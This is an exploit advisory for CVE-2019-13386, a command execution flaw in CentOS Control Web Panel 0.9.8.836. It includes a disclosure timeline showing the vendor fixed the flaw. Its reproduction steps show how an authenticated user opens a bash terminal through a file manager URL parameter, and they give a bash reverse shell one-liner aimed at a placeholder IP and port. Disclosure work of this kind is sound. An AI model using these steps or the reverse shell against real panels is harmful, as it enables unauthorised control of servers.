Share
# Exploit Title: CWP (CentOS Control Web Panel) 0.9.8.836 - Remote Command Execution  
# Date: 6 July 2019  
# Exploit Author: Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak  
# Vendor Homepage: https://control-webpanel.com/  
# Version: 0.9.8.836  
# Tested on: CentOS 7.6.1810 (Core)  
# CVE : CVE-2019-13386  
  
+++++++++++++++++++++++++++++++++  
# Description:  
+++++++++++++++++++++++++++++++++  
  
From the application interface, it does not allow user to run OS commands directly. If user want to run OS commands, they need to do it through crontab function. The vulnerability allows users to executed OS commands directly through web browser.  
  
+++++++++++++++++++++++++++++++++  
# Steps to Reproduce  
+++++++++++++++++++++++++++++++++  
  
1. Login into the CentOS Web Panel using user credential  
2. Go to file manager  
3. add "?action=9" on url , bash terminal will show  
Example: https://[target.com]:2083/cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/username/fileManager2.php?action=9  
4. Users can run OS commands through web browser  
5. Create reverse shell through OS commands   
- reverse shell payload "bash -i >& /dev/tcp/[local IP Address]/[port] 0>&1"  
  
+++++++++++++++++++++++++++++++++  
# POC  
+++++++++++++++++++++++++++++++++  
  
https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13386.md  
  
+++++++++++++++++++++++++++++++++  
# Timeline  
+++++++++++++++++++++++++++++++++  
2019-07-05: Discovered the bug  
2019-07-05: Reported to vendor  
2019-07-05: Vender accepted the vulnerability  
2019-07-11: The vulnerability has been fixed  
2019-07-23: Published  
  
+++++++++++++++++++++++++++++++++  
# Discovered by  
+++++++++++++++++++++++++++++++++  
Pongtorn Angsuchotmetee  
Nissana Sirijirakal  
Narin Boonwasanarak